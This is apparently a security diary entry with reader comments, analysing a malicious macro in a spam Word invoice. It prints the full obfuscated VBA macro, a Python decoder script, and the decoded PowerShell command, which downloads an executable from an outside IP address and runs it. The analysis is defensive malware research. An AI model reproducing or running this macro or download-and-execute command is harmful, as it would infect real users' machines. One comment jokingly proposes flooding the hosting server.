[Guest Diary: Xavier Mertens] [Analyzing an MS Word document not detected by AV software] Like everybody, I'm receiving a lot of spam everyday but... I like it! All unsolicited received messages are stored in a dedicated folder for two purposes:
This helps me to find new types of spams or new techniques used by attackers to deliver malicious content in our mailboxes. Today, I received an interesting Word document. I'm not sure if it is a very common one but I did a small analysis. The mail was based on a classic fake invoice notification: From: Ollie Oconnor $ ./oledump.py /tmp/20150331-A7740189461014146728299-1.doc 1: 113 '\x01CompObj' 2: 4096 '\x05DocumentSummaryInformation' 3: 4096 '\x05SummaryInformation' 4: 4096 '1Table' 5: 4096 'Data' 6: 490 'Macros/PROJECT' 7: 65 'Macros/PROJECTwm' 8: M 11613 'Macros/VBA/Module1' 9: M 1214 'Macros/VBA/ThisDocument' 10: 2932 'Macros/VBA/_VBA_PROJECT' 11: 1165 'Macros/VBA/__SRP_0' 12: 70 'Macros/VBA/__SRP_1' 13: 8430 'Macros/VBA/__SRP_2' 14: 103 'Macros/VBA/__SRP_3' 15: 561 'Macros/VBA/dir' 16: 5684 'WordDocument' $ ./oledump.py -s 8 -v /tmp/20150331-A7740189461014146728299-1.doc Attribute VB_Name = "Module1" Sub sdfsdfdsf() GVhkjbjv = chrw(49.5 + 49.5) & chrw(54.5 + 54.5) & chrw(50 + 50) & chrw(16 + 16) & chrw(23.5 + 23.5) & chrw(37.5 + 37.5) & chrw(16 + 16) & chrw(56 + 56) & chrw(55.5 + 55.5) & chrw(59.5 + 59.5) & chrw(50.5 + 50.5) & chrw(57 + 57) & chrw(57.5 + 57.5) & chrw(52 + 52) & chrw(50.5 + 50.5) & chrw(54 + 54) & chrw(54 + 54) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(16 + 16) & chrw(22.5 + 22.5) & chrw(34.5 + 34.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(58.5 + 58.5) & chrw(58 + 58) & chrw(52.5 + 52.5) & chrw(55.5 + 55.5) & chrw(55 + 55) & chrw(40 + 40) & chrw(55.5 + 55.5) & chrw(54 + 54) & chrw(52.5 + 52.5) & chrw(49.5 + 49.5) & chrw(60.5 + 60.5) & chrw(16 + 16) & chrw(49 + 49) & chrw(60.5 + 60.5) & chrw(56 + 56) & chrw(48.5 + 48.5) & chrw(57.5 + 57.5) & chrw(57.5 + 57.5) & chrw(16 + 16) GYUUYIiii = chrw(22.5 + 22.5) & chrw(55 + 55) & chrw(55.5 + 55.5) & chrw(56 + 56) & chrw(57 + 57) & chrw(55.5 + 55.5) & chrw(51 + 51) & chrw(52.5 + 52.5) & chrw(54 + 54) & chrw(50.5 + 50.5) & chrw(16 + 16) & chrw(20 + 20) & chrw(39 + 39) & chrw(50.5 + 50.5) & chrw(59.5 + 59.5) & chrw(22.5 + 22.5) & chrw(39.5 + 39.5) & chrw(49 + 49) & chrw(53 + 53) & chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(58 + 58) & chrw(16 + 16) & chrw(41.5 + 41.5) & chrw(60.5 + 60.5) & chrw(57.5 + 57.5) & chrw(58 + 58) & chrw(50.5 + 50.5) & chrw(54.5 + 54.5) & chrw(23 + 23) & chrw(39 + 39) & chrw(50.5 + 50.5) & chrw(58 + 58) & chrw(23 + 23) & chrw(43.5 + 43.5) & chrw(50.5 + 50.5) & chrw(49 + 49) & chrw(33.5 + 33.5) & chrw(54 + 54) & chrw(52.5 + 52.5) & chrw(50.5 + 50.5) & chrw(55 + 55) & chrw(58 + 58) & chrw(20.5 + 20.5) & chrw(23 + 23) hgFYyhhshu = chrw(34 + 34) & chrw(55.5 + 55.5) & chrw(59.5 + 59.5) & chrw(55 + 55) & chrw(54 + 54) & chrw(55.5 + 55.5) & chrw(48.5 + 48.5) & chrw(50 + 50) & chrw(35 + 35) & chrw(52.5 + 52.5) & chrw(54 + 54) & chrw(50.5 + 50.5) & chrw(20 + 20) & chrw(19.5 + 19.5) & chrw(52 + 52) & chrw(58 + 58) & chrw(58 + 58) & chrw(56 + 56) & chrw(29 + 29) & chrw(23.5 + 23.5) & chrw(23.5 + 23.5) & chrw(24.5 + 24.5) & chrw(28 + 28) & chrw(26.5 + 26.5) & chrw(23 + 23) & chrw(25.5 + 25.5) & chrw(28.5 + 28.5) & chrw(23 + 23) & chrw(24.5 + 24.5) & chrw(26 + 26) & chrw(28.5 + 28.5) & chrw(23 + 23) & chrw(25 + 25) & chrw(24.5 + 24.5) & chrw(23.5 + 23.5) & chrw(53 + 53) & chrw(57.5 + 57.5) & chrw(48.5 + 48.5) & chrw(60 + 60) & chrw(55.5 + 55.5) & chrw(28 + 28) & chrw(58.5 + 58.5) & chrw(23.5 + 23.5) & chrw(51.5 + 51.5) & chrw(25.5 + 25.5) & chrw(28.5 + 28.5) & chrw(49 + 49) & chrw(25 + 25) & chrw(49.5 + 49.5) & chrw(60 + 60) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(19.5 + 19.5) GYiuudsuds = chrw(22 + 22) & chrw(19.5 + 19.5) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(49.5 + 49.5) & chrw(48.5 + 48.5) & chrw(49 + 49) & chrw(19.5 + 19.5) & chrw(20.5 + 20.5) & chrw(29.5 + 29.5) & chrw(16 + 16) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(56 + 56) & chrw(48.5 + 48.5) & chrw(55 + 55) & chrw(50 + 50) & chrw(16 + 16) shdfihiof = chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(49.5 + 49.5) & chrw(48.5 + 48.5) & chrw(49 + 49) & chrw(16 + 16) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) doifhsoip = chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(29.5 + 29.5) & chrw(16 + 16) & chrw(57.5 + 57.5) & chrw(58 + 58) & chrw(48.5 + 48.5) & chrw(57 + 57) & chrw(58 + 58) & chrw(16 + 16) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(29.5 + 29.5) JHGUgisdc = GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip IUGuyguisdf = Shell(JHGUgisdc, 0) End Sub
#!/usr/bin/python
import re
import sys
data = sys.stdin.read()
r = re.compile('chrw\((\S+) \+ (\S+)\)')
i = re.findall(r, data)
cmd = ""
for match in i:
cmd = cmd + chr(int(float(match[0]) + float(match[1]))
print cmd
# ./oledump.py -s 8 -v /tmp/20150331-A7740189461014146728299-1.doc | ./decode.py
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.39.149.21/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
-- |
Alex Stanford 136 Posts Apr 7th 2015 |
Thread locked Subscribe |
Apr 7th 2015 5 years ago |
Alex, this Cisco Talos blog also covers the same threat
hxxp://blogs.cisco.com/security/talos/spam-dridex |
Anonymous |
Quote |
Apr 7th 2015 5 years ago |
It is so very tempting to flood that webserver continuously so it is knocked off the net, rendering that download useless... but maybe that's exactly what's happening now, as it seems down... ;)
One should also send the owner - alex@biscon.org (send me lots of spam!) - an anonymous note telling him just how stupid he is... ;) |
Per 11 Posts |
Quote |
Apr 8th 2015 5 years ago |
I also have seen this type of obfuscated VBA Macro and blogged about it recently ( hxxp://neonprimetime.blogspot.com/2015/03/obfuscated-malicious-vba-macro.html )
|
Per 12 Posts |
Quote |
Apr 8th 2015 5 years ago |
Sign Up for Free or Log In to start participating in the conversation!